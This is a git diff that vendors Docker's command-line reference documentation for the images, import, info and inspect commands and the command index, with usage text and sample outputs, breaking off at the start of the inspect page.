+deleted: sha256:35e0f43a37755b832f0bbea91a2360b025ee351d7309dae0d9737bc96b6d0809
+deleted: sha256:0af941dd29f00e4510195dd00b19671bc591e29d1495630e7e0f7c44c1e6a8c0
+deleted: sha256:9fc896fc2013da84f84e45b3096053eb084417b42e6b35ea0cce5a3529705eac
+deleted: sha256:47cf20d8c26c46fff71be614d9f54997edacfe8d46d51769706e5aba94b16f2b
+deleted: sha256:2c675ee9ed53425e31a13e3390bf3f539bf8637000e4bcfbb85ee03ef4d910a1
+
+Total reclaimed space: 16.43 MB
+```
+
+## Related information
+
+* [system df](system_df.md)
+* [container prune](container_prune.md)
+* [volume prune](volume_prune.md)
+* [network prune](network_prune.md)
+* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/images.md b/vendor/github.com/docker/docker/docs/reference/commandline/images.md
new file mode 100644
index 0000000000..3b9ea1fe17
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/images.md
@@ -0,0 +1,304 @@
+---
+title: "images"
+description: "The images command description and usage"
+keywords: "list, docker, images"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# images
+
+```markdown
+Usage:  docker images [OPTIONS] [REPOSITORY[:TAG]]
+
+List images
+
+Options:
+  -a, --all             Show all images (default hides intermediate images)
+      --digests         Show digests
+  -f, --filter value    Filter output based on conditions provided (default [])
+                        - dangling=(true|false)
+                        - label=<key> or label=<key>=<value>
+                        - before=(<image-name>[:tag]|<image-id>|<image@digest>)
+                        - since=(<image-name>[:tag]|<image-id>|<image@digest>)
+                        - reference=(pattern of an image reference)
+      --format string   Pretty-print images using a Go template
+      --help            Print usage
+      --no-trunc        Don't truncate output
+  -q, --quiet           Only show numeric IDs
+```
+
+The default `docker images` will show all top level
+images, their repository and tags, and their size.
+
+Docker images have intermediate layers that increase reusability,
+decrease disk usage, and speed up `docker build` by
+allowing each step to be cached. These intermediate layers are not shown
+by default.
+
+The `SIZE` is the cumulative space taken up by the image and all
+its parent images. This is also the disk space used by the contents of the
+Tar file created when you `docker save` an image.
+
+An image will be listed more than once if it has multiple repository names
+or tags. This single image (identifiable by its matching `IMAGE ID`)
+uses up the `SIZE` listed only once.
+
+### Listing the most recently created images
+
+    $ docker images
+    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
+    <none>                    <none>              77af4d6b9913        19 hours ago        1.089 GB
+    committ                   latest              b6fa739cedf5        19 hours ago        1.089 GB
+    <none>                    <none>              78a85c484f71        19 hours ago        1.089 GB
+    docker                    latest              30557a29d5ab        20 hours ago        1.089 GB
+    <none>                    <none>              5ed6274db6ce        24 hours ago        1.089 GB
+    postgres                  9                   746b819f315e        4 days ago          213.4 MB
+    postgres                  9.3                 746b819f315e        4 days ago          213.4 MB
+    postgres                  9.3.5               746b819f315e        4 days ago          213.4 MB
+    postgres                  latest              746b819f315e        4 days ago          213.4 MB
+
+### Listing images by name and tag
+
+The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument
+that restricts the list to images that match the argument. If you specify
+`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the
+given repository.
+
+For example, to list all images in the "java" repository, run this command :
+
+    $ docker images java
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    java                8                   308e519aac60        6 days ago          824.5 MB
+    java                7                   493d82594c15        3 months ago        656.3 MB
+    java                latest              2711b1d6f3aa        5 months ago        603.9 MB
+
+The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example,
+`docker images jav` does not match the image `java`.
+
+If both `REPOSITORY` and `TAG` are provided, only images matching that
+repository and tag are listed.  To find all local images in the "java"
+repository with tag "8" you can use:
+
+    $ docker images java:8
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    java                8                   308e519aac60        6 days ago          824.5 MB
+
+If nothing matches `REPOSITORY[:TAG]`, the list is empty.
+
+    $ docker images java:0
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+
+## Listing the full length image IDs
+
+    $ docker images --no-trunc
+    REPOSITORY                    TAG                 IMAGE ID                                                                  CREATED             SIZE
+    <none>                        <none>              sha256:77af4d6b9913e693e8d0b4b294fa62ade6054e6b2f1ffb617ac955dd63fb0182   19 hours ago        1.089 GB
+    committest                    latest              sha256:b6fa739cedf5ea12a620a439402b6004d057da800f91c7524b5086a5e4749c9f   19 hours ago        1.089 GB
+    <none>                        <none>              sha256:78a85c484f71509adeaace20e72e941f6bdd2b25b4c75da8693efd9f61a37921   19 hours ago        1.089 GB
+    docker                        latest              sha256:30557a29d5abc51e5f1d5b472e79b7e296f595abcf19fe6b9199dbbc809c6ff4   20 hours ago        1.089 GB
+    <none>                        <none>              sha256:0124422dd9f9cf7ef15c0617cda3931ee68346455441d66ab8bdc5b05e9fdce5   20 hours ago        1.089 GB
+    <none>                        <none>              sha256:18ad6fad340262ac2a636efd98a6d1f0ea775ae3d45240d3418466495a19a81b   22 hours ago        1.082 GB
+    <none>                        <none>              sha256:f9f1e26352f0a3ba6a0ff68167559f64f3e21ff7ada60366e2d44a04befd1d3a   23 hours ago        1.089 GB
+    tryout                        latest              sha256:2629d1fa0b81b222fca63371ca16cbf6a0772d07759ff80e8d1369b926940074   23 hours ago        131.5 MB
+    <none>                        <none>              sha256:5ed6274db6ceb2397844896966ea239290555e74ef307030ebb01ff91b1914df   24 hours ago        1.089 GB
+
+## Listing image digests
+
+Images that use the v2 or later format have a content-addressable identifier
+called a `digest`. As long as the input used to generate the image is
+unchanged, the digest value is predictable. To list image digest values, use
+the `--digests` flag:
+
+    $ docker images --digests
+    REPOSITORY                         TAG                 DIGEST                                                                    IMAGE ID            CREATED             SIZE
+    localhost:5000/test/busybox        <none>              sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf   4986bf8c1536        9 weeks ago         2.43 MB
+
+When pushing or pulling to a 2.0 registry, the `push` or `pull` command
+output includes the image digest. You can `pull` using a digest value. You can
+also reference by digest in `create`, `run`, and `rmi` commands, as well as the
+`FROM` image reference in a Dockerfile.
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
+than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* dangling (boolean - true or false)
+* label (`label=<key>` or `label=<key>=<value>`)
+* before (`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`) - filter images created before given id or references
+* since (`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`) - filter images created since given id or references
+
+##### Untagged images (dangling)
+
+    $ docker images --filter "dangling=true"
+
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    <none>              <none>              8abc22fbb042        4 weeks ago         0 B
+    <none>              <none>              48e5f45168b9        4 weeks ago         2.489 MB
+    <none>              <none>              bf747efa0e2f        4 weeks ago         0 B
+    <none>              <none>              980fe10e5736        12 weeks ago        101.4 MB
+    <none>              <none>              dea752e4e117        12 weeks ago        101.4 MB
+    <none>              <none>              511136ea3c5a        8 months ago        0 B
+
+This will display untagged images, that are the leaves of the images tree (not
+intermediary layers). These images occur when a new build of an image takes the
+`repo:tag` away from the image ID, leaving it as `<none>:<none>` or untagged.
+A warning will be issued if trying to remove an image when a container is presently
+using it. By having this flag it allows for batch cleanup.
+
+Ready for use by `docker rmi ...`, like:
+
+    $ docker rmi $(docker images -f "dangling=true" -q)
+
+    8abc22fbb042
+    48e5f45168b9
+    bf747efa0e2f
+    980fe10e5736
+    dea752e4e117
+    511136ea3c5a
+
+NOTE: Docker will warn you if any containers exist that are using these untagged images.
+
+
+##### Labeled images
+
+The `label` filter matches images based on the presence of a `label` alone or a `label` and a
+value.
+
+The following filter matches images with the `com.example.version` label regardless of its value.
+
+    $ docker images --filter "label=com.example.version"
+
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+    match-me-1          latest              eeae25ada2aa        About a minute ago   188.3 MB
+    match-me-2          latest              dea752e4e117        About a minute ago   188.3 MB
+
+The following filter matches images with the `com.example.version` label with the `1.0` value.
+
+    $ docker images --filter "label=com.example.version=1.0"
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+    match-me            latest              511136ea3c5a        About a minute ago   188.3 MB
+
+In this example, with the `0.1` value, it returns an empty set because no matches were found.
+
+    $ docker images --filter "label=com.example.version=0.1"
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+
+#### Before
+
+The `before` filter shows only images created before the image with
+given id or reference. For example, having these images:
+
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+    image1              latest              eeae25ada2aa        4 minutes ago        188.3 MB
+    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
+    image3              latest              511136ea3c5a        25 minutes ago       188.3 MB
+
+Filtering with `before` would give:
+
+    $ docker images --filter "before=image1"
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
+    image3              latest              511136ea3c5a        25 minutes ago       188.3 MB
+
+#### Since
+
+The `since` filter shows only images created after the image with
+given id or reference. For example, having these images:
+
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+    image1              latest              eeae25ada2aa        4 minutes ago        188.3 MB
+    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
+    image3              latest              511136ea3c5a        25 minutes ago       188.3 MB
+
+Filtering with `since` would give:
+
+    $ docker images --filter "since=image3"
+    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
+    image1              latest              eeae25ada2aa        4 minutes ago        188.3 MB
+    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
+
+#### Reference
+
+The `reference` filter shows only images whose reference matches
+the specified pattern.
+
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    busybox             latest              e02e811dd08f        5 weeks ago         1.09 MB
+    busybox             uclibc              e02e811dd08f        5 weeks ago         1.09 MB
+    busybox             musl                733eb3059dce        5 weeks ago         1.21 MB
+    busybox             glibc               21c16b6787c6        5 weeks ago         4.19 MB
+
+Filtering with `reference` would give:
+
+    $ docker images --filter=reference='busy*:*libc'
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    busybox             uclibc              e02e811dd08f        5 weeks ago         1.09 MB
+    busybox             glibc               21c16b6787c6        5 weeks ago         4.19 MB
+
+## Formatting
+
+The formatting option (`--format`) will pretty print container output
+using a Go template.
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder | Description
+---- | ----
+`.ID` | Image ID
+`.Repository` | Image repository
+`.Tag` | Image tag
+`.Digest` | Image digest
+`.CreatedSince` | Elapsed time since the image was created
+`.CreatedAt` | Time when the image was created
+`.Size` | Image disk size
+
+When using the `--format` option, the `image` command will either
+output the data exactly as the template declares or, when using the
+`table` directive, will include column headers as well.
+
+The following example uses a template without headers and outputs the
+`ID` and `Repository` entries separated by a colon for all images:
+
+    {% raw %}
+    $ docker images --format "{{.ID}}: {{.Repository}}"
+    77af4d6b9913: <none>
+    b6fa739cedf5: committ
+    78a85c484f71: <none>
+    30557a29d5ab: docker
+    5ed6274db6ce: <none>
+    746b819f315e: postgres
+    746b819f315e: postgres
+    746b819f315e: postgres
+    746b819f315e: postgres
+    {% endraw %}
+
+To list all images with their repository and tag in a table format you
+can use:
+
+    {% raw %}
+    $ docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}"
+    IMAGE ID            REPOSITORY                TAG
+    77af4d6b9913        <none>                    <none>
+    b6fa739cedf5        committ                   latest
+    78a85c484f71        <none>                    <none>
+    30557a29d5ab        docker                    latest
+    5ed6274db6ce        <none>                    <none>
+    746b819f315e        postgres                  9
+    746b819f315e        postgres                  9.3
+    746b819f315e        postgres                  9.3.5
+    746b819f315e        postgres                  latest
+    {% endraw %}
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/import.md b/vendor/github.com/docker/docker/docs/reference/commandline/import.md
new file mode 100644
index 0000000000..20e90a61fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/import.md
@@ -0,0 +1,75 @@
+---
+title: "import"
+description: "The import command description and usage"
+keywords: "import, file, system, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# import
+
+```markdown
+Usage:  docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]
+
+Import the contents from a tarball to create a filesystem image
+
+Options:
+  -c, --change value     Apply Dockerfile instruction to the created image (default [])
+      --help             Print usage
+  -m, --message string   Set commit message for imported image
+```
+
+You can specify a `URL` or `-` (dash) to take data directly from `STDIN`. The
+`URL` can point to an archive (.tar, .tar.gz, .tgz, .bzip, .tar.xz, or .txz)
+containing a filesystem or to an individual file on the Docker host.  If you
+specify an archive, Docker untars it in the container relative to the `/`
+(root). If you specify an individual file, you must specify the full path within
+the host. To import from a remote location, specify a `URI` that begins with the
+`http://` or `https://` protocol.
+
+The `--change` option will apply `Dockerfile` instructions to the image
+that is created.
+Supported `Dockerfile` instructions:
+`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
+
+## Examples
+
+**Import from a remote location:**
+
+This will create a new untagged image.
+
+    $ docker import http://example.com/exampleimage.tgz
+
+**Import from a local file:**
+
+Import to docker via pipe and `STDIN`.
+
+    $ cat exampleimage.tgz | docker import - exampleimagelocal:new
+
+Import with a commit message.
+
+    $ cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new
+
+Import to docker from a local archive.
+
+    $ docker import /path/to/exampleimage.tgz
+
+**Import from a local directory:**
+
+    $ sudo tar -c . | docker import - exampleimagedir
+
+**Import from a local directory with new configurations:**
+
+    $ sudo tar -c . | docker import --change "ENV DEBUG true" - exampleimagedir
+
+Note the `sudo` in this example – you must preserve
+the ownership of the files (especially root ownership) during the
+archiving with tar. If you are not root (or the sudo command) when you
+tar, then the ownerships might not get preserved.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/index.md b/vendor/github.com/docker/docker/docs/reference/commandline/index.md
new file mode 100644
index 0000000000..952fa09df1
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/index.md
@@ -0,0 +1,178 @@
+---
+title: "Docker commands"
+description: "Docker's CLI command description and usage"
+keywords: "Docker, Docker documentation, CLI, command line"
+identifier: "smn_cli_guide"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# The Docker commands
+
+This section contains reference information on using Docker's command line
+client. Each command has a reference page along with samples. If you are
+unfamiliar with the command line, you should start by reading about how to [Use
+the Docker command line](cli.md).
+
+You start the Docker daemon with the command line. How you start the daemon
+affects your Docker containers. For that reason you should also make sure to
+read the [`dockerd`](dockerd.md) reference page.
+
+### Docker management commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [dockerd](dockerd.md) | Launch the Docker daemon                             |
+| [info](info.md) | Display system-wide information                            |
+| [inspect](inspect.md)| Return low-level information on a container or image  |
+| [version](version.md) | Show the Docker version information                  |
+
+
+### Image commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [build](build.md) |  Build an image from a Dockerfile                        |
+| [commit](commit.md) | Create a new image from a container's changes          |
+| [history](history.md) | Show the history of an image                         |
+| [images](images.md) | List images                                            |
+| [import](import.md) | Import the contents from a tarball to create a filesystem image |
+| [load](load.md) | Load an image from a tar archive or STDIN                  |
+| [rmi](rmi.md) | Remove one or more images                                    |
+| [save](save.md) | Save images to a tar archive                               |
+| [tag](tag.md) | Tag an image into a repository                               |
+
+### Container commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [attach](attach.md) | Attach to a running container                          |
+| [cp](cp.md) | Copy files/folders from a container to a HOSTDIR or to STDOUT  |
+| [create](create.md) | Create a new container                                 |
+| [diff](diff.md) | Inspect changes on a container's filesystem                |
+| [events](events.md) | Get real time events from the server                   |
+| [exec](exec.md) | Run a command in a running container                       |
+| [export](export.md) | Export a container's filesystem as a tar archive       |
+| [kill](kill.md) | Kill a running container                                   |
+| [logs](logs.md) | Fetch the logs of a container                              |
+| [pause](pause.md) | Pause all processes within a container                   |
+| [port](port.md) | List port mappings or a specific mapping for the container |
+| [ps](ps.md) | List containers                                                |
+| [rename](rename.md) | Rename a container                                     |
+| [restart](restart.md) | Restart a running container                          |
+| [rm](rm.md) | Remove one or more containers                                  |
+| [run](run.md) | Run a command in a new container                             |
+| [start](start.md) | Start one or more stopped containers                     |
+| [stats](stats.md) | Display a live stream of container(s) resource usage  statistics |
+| [stop](stop.md) | Stop a running container                                   |
+| [top](top.md) | Display the running processes of a container                 |
+| [unpause](unpause.md) | Unpause all processes within a container             |
+| [update](update.md) | Update configuration of one or more containers         |
+| [wait](wait.md) | Block until a container stops, then print its exit code    |
+
+### Hub and registry commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [login](login.md) | Register or log in to a Docker registry                  |
+| [logout](logout.md) | Log out from a Docker registry                         |
+| [pull](pull.md) | Pull an image or a repository from a Docker registry       |
+| [push](push.md) | Push an image or a repository to a Docker registry         |
+| [search](search.md) | Search the Docker Hub for images                       |
+
+### Network and connectivity commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [network connect](network_connect.md) | Connect a container to a network     |
+| [network create](network_create.md) | Create a new network                   |
+| [network disconnect](network_disconnect.md) | Disconnect a container from a network |
+| [network inspect](network_inspect.md) | Display information about a network  |
+| [network ls](network_ls.md) | Lists all the networks the Engine `daemon` knows about |
+| [network rm](network_rm.md) | Removes one or more networks                   |
+
+
+### Shared data volume commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [volume create](volume_create.md) | Creates a new volume where containers can consume and store data |
+| [volume inspect](volume_inspect.md) | Display information about a volume     |
+| [volume ls](volume_ls.md) | Lists all the volumes Docker knows about         |
+| [volume prune](volume_prune.md) | Remove all unused volumes                  |
+| [volume rm](volume_rm.md) | Remove one or more volumes                       |
+
+
+### Swarm node commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [node promote](node_promote.md) | Promote a node that is pending a promotion to manager |
+| [node demote](node_demote.md) | Demotes an existing manager so that it is no longer a manager |
+| [node inspect](node_inspect.md) | Inspect a node in the swarm                |
+| [node update](node_update.md) | Update attributes for a node                 |
+| [node ps](node_ps.md) | List tasks running on one or more nodes                         |
+| [node ls](node_ls.md) | List nodes in the swarm                              |
+| [node rm](node_rm.md) | Remove one or more nodes from the swarm                         |
+
+### Swarm swarm commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [swarm init](swarm_init.md) | Initialize a swarm                             |
+| [swarm join](swarm_join.md) | Join a swarm as a manager node or worker node  |
+| [swarm leave](swarm_leave.md) | Remove the current node from the swarm       |
+| [swarm update](swarm_update.md) | Update attributes of a swarm               |
+| [swarm join-token](swarm_join_token.md) | Display or rotate join tokens      |
+
+### Swarm service commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [service create](service_create.md) | Create a new service                   |
+| [service inspect](service_inspect.md) | Inspect a service                    |
+| [service ls](service_ls.md) | List services in the swarm                     |
+| [service rm](service_rm.md) | Remove a service from the swarm                |
+| [service scale](service_scale.md) | Set the number of replicas for the desired state of the service |
+| [service ps](service_ps.md) | List the tasks of a service              |
+| [service update](service_update.md)  | Update the attributes of a service    |
+
+### Swarm secret commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [secret create](secret_create.md) | Create a secret from a file or STDIN as content |
+| [secret inspect](service_inspect.md) | Inspect the specified secret          |
+| [secret ls](secret_ls.md) | List secrets in the swarm                        |
+| [secret rm](secret_rm.md) | Remove the specified secrets from the swarm      |
+
+### Swarm stack commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [stack deploy](stack_deploy.md) | Deploy a new stack or update an existing stack |
+| [stack ls](stack_ls.md) | List stacks in the swarm                           |
+| [stack ps](stack_ps.md) | List the tasks in the stack                        |
+| [stack rm](stack_rm.md) | Remove the stack from the swarm                    |
+| [stack services](stack_services.md) | List the services in the stack         |
+
+### Plugin commands
+
+| Command | Description                                                        |
+|:--------|:-------------------------------------------------------------------|
+| [plugin create](plugin_create.md) | Create a plugin from a rootfs and configuration |
+| [plugin disable](plugin_disable.md) | Disable a plugin                       |
+| [plugin enbale](plugin_enable.md)  | Enable a plugin                         |
+| [plugin inspect](plugin_inspect.md) | Display detailed information on a plugin |
+| [plugin install](plugin_install.md) | Install a plugin                       |
+| [plugin ls](plugin_ls.md) | List plugins                                     |
+| [plugin push](plugin_push.md) | Push a plugin to a registry                  |
+| [plugin rm](plugin_rm.md) | Remove a plugin                                  |
+| [plugin set](plugin_set.md)  | Change settings for a plugin                  |
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/info.md b/vendor/github.com/docker/docker/docs/reference/commandline/info.md
new file mode 100644
index 0000000000..50a084fcb2
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/info.md
@@ -0,0 +1,224 @@
+---
+title: "info"
+description: "The info command description and usage"
+keywords: "display, docker, information"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# info
+
+```markdown
+Usage:  docker info [OPTIONS]
+
+Display system-wide information
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+```
+
+This command displays system wide information regarding the Docker installation.
+Information displayed includes the kernel version, number of containers and images.
+The number of images shown is the number of unique images. The same image tagged
+under different names is counted only once.
+
+If a format is specified, the given template will be executed instead of the
+default format. Go's [text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+Depending on the storage driver in use, additional information can be shown, such
+as pool name, data file, metadata file, data space used, total data space, metadata
+space used, and total metadata space.
+
+The data file is where the images are stored and the metadata file is where the
+meta data regarding those images are stored. When run for the first time Docker
+allocates a certain amount of data space and meta data space from the space
+available on the volume where `/var/lib/docker` is mounted.
+
+# Examples
+
+## Display Docker system information
+
+Here is a sample output for a daemon running on Ubuntu, using the overlay2
+storage driver and a node that is part of a 2-node swarm:
+
+    $ docker -D info
+    Containers: 14
+     Running: 3
+     Paused: 1
+     Stopped: 10
+    Images: 52
+    Server Version: 1.13.0
+    Storage Driver: overlay2
+     Backing Filesystem: extfs
+     Supports d_type: true
+     Native Overlay Diff: false
+    Logging Driver: json-file
+    Cgroup Driver: cgroupfs
+    Plugins:
+     Volume: local
+     Network: bridge host macvlan null overlay
+    Swarm: active
+     NodeID: rdjq45w1op418waxlairloqbm
+     Is Manager: true
+     ClusterID: te8kdyw33n36fqiz74bfjeixd
+     Managers: 1
+     Nodes: 2
+     Orchestration:
+      Task History Retention Limit: 5
+     Raft:
+      Snapshot Interval: 10000
+      Number of Old Snapshots to Retain: 0
+      Heartbeat Tick: 1
+      Election Tick: 3
+     Dispatcher:
+      Heartbeat Period: 5 seconds
+     CA Configuration:
+      Expiry Duration: 3 months
+     Node Address: 172.16.66.128 172.16.66.129
+     Manager Addresses:
+      172.16.66.128:2477
+    Runtimes: runc
+    Default Runtime: runc
+    Init Binary: docker-init
+    containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531
+    runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2
+    init version: N/A (expected: v0.13.0)
+    Security Options:
+     apparmor
+     seccomp
+      Profile: default
+    Kernel Version: 4.4.0-31-generic
+    Operating System: Ubuntu 16.04.1 LTS
+    OSType: linux
+    Architecture: x86_64
+    CPUs: 2
+    Total Memory: 1.937 GiB
+    Name: ubuntu
+    ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326
+    Docker Root Dir: /var/lib/docker
+    Debug Mode (client): true
+    Debug Mode (server): true
+     File Descriptors: 30
+     Goroutines: 123
+     System Time: 2016-11-12T17:24:37.955404361-08:00
+     EventsListeners: 0
+    Http Proxy: http://test:test@proxy.example.com:8080
+    Https Proxy: https://test:test@proxy.example.com:8080
+    No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com
+    Registry: https://index.docker.io/v1/
+    WARNING: No swap limit support
+    Labels:
+     storage=ssd
+     staging=true
+    Experimental: false
+    Insecure Registries:
+     127.0.0.0/8
+    Registry Mirrors:
+      http://192.168.1.2/
+      http://registry-mirror.example.com:5000/
+    Live Restore Enabled: false
+
+The global `-D` option tells all `docker` commands to output debug information.
+
+The example below shows the output for a daemon running on Red Hat Enterprise Linux,
+using the devicemapper storage driver. As can be seen in the output, additional
+information about the devicemapper storage driver is shown:
+
+    $ docker info
+    Containers: 14
+     Running: 3
+     Paused: 1
+     Stopped: 10
+    Images: 52
+    Server Version: 1.10.3
+    Storage Driver: devicemapper
+     Pool Name: docker-202:2-25583803-pool
+     Pool Blocksize: 65.54 kB
+     Base Device Size: 10.74 GB
+     Backing Filesystem: xfs
+     Data file: /dev/loop0
+     Metadata file: /dev/loop1
+     Data Space Used: 1.68 GB
+     Data Space Total: 107.4 GB
+     Data Space Available: 7.548 GB
+     Metadata Space Used: 2.322 MB
+     Metadata Space Total: 2.147 GB
+     Metadata Space Available: 2.145 GB
+     Udev Sync Supported: true
+     Deferred Removal Enabled: false
+     Deferred Deletion Enabled: false
+     Deferred Deleted Device Count: 0
+     Data loop file: /var/lib/docker/devicemapper/devicemapper/data
+     Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
+     Library Version: 1.02.107-RHEL7 (2015-12-01)
+    Execution Driver: native-0.2
+    Logging Driver: json-file
+    Plugins:
+     Volume: local
+     Network: null host bridge
+    Kernel Version: 3.10.0-327.el7.x86_64
+    Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo)
+    OSType: linux
+    Architecture: x86_64
+    CPUs: 1
+    Total Memory: 991.7 MiB
+    Name: ip-172-30-0-91.ec2.internal
+    ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S
+    Docker Root Dir: /var/lib/docker
+    Debug mode (client): false
+    Debug mode (server): false
+    Username: gordontheturtle
+    Registry: https://index.docker.io/v1/
+    Insecure registries:
+     myinsecurehost:5000
+     127.0.0.0/8
+
+You can also specify the output format:
+
+    $ docker info --format '{{json .}}'
+	{"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...}
+
+Here is a sample output for a daemon running on Windows Server 2016:
+
+    E:\docker>docker info
+    Containers: 1
+     Running: 0
+     Paused: 0
+     Stopped: 1
+    Images: 17
+    Server Version: 1.13.0
+    Storage Driver: windowsfilter
+     Windows:
+    Logging Driver: json-file
+    Plugins:
+     Volume: local
+     Network: nat null overlay
+    Swarm: inactive
+    Default Isolation: process
+    Kernel Version: 10.0 14393 (14393.206.amd64fre.rs1_release.160912-1937)
+    Operating System: Windows Server 2016 Datacenter
+    OSType: windows
+    Architecture: x86_64
+    CPUs: 8
+    Total Memory: 3.999 GiB
+    Name: WIN-V0V70C0LU5P
+    ID: NYMS:B5VK:UMSL:FVDZ:EWB5:FKVK:LPFL:FJMQ:H6FT:BZJ6:L2TD:XH62
+    Docker Root Dir: C:\control
+    Debug Mode (client): false
+    Debug Mode (server): false
+    Registry: https://index.docker.io/v1/
+    Insecure Registries:
+     127.0.0.0/8
+    Registry Mirrors:
+      http://192.168.1.2/
+      http://registry-mirror.example.com:5000/
+    Live Restore Enabled: false
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md
new file mode 100644
index 0000000000..7a0c3a0871
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md
@@ -0,0 +1,102 @@
+---
+title: "inspect"
+description: "The inspect command description and usage"
+keywords: "inspect, container, json"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# inspect
+
+```markdown
+Usage:  docker inspect [OPTIONS] NAME|ID [NAME|ID...]
+
+Return low-level information on Docker object(s) (e.g. container, image, volume,
+network, node, service, or task) identified by name or ID
+
+Options:
+  -f, --format       Format the output using the given Go template
+      --help         Print usage
+  -s, --size         Display total file sizes if the type is container
+      --type         Return JSON for specified type
+```
+
+By default, this will render all results in a JSON array. If the container and
+image have the same name, this will return container JSON for unspecified type.
+If a format is specified, the given template will be executed for each result.
+
+Go's [text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+## Examples
+
+**Get an instance's IP address:**
+
+For the most part, you can pick out any field from the JSON in a fairly
+straightforward manner.
+
+    {% raw %}
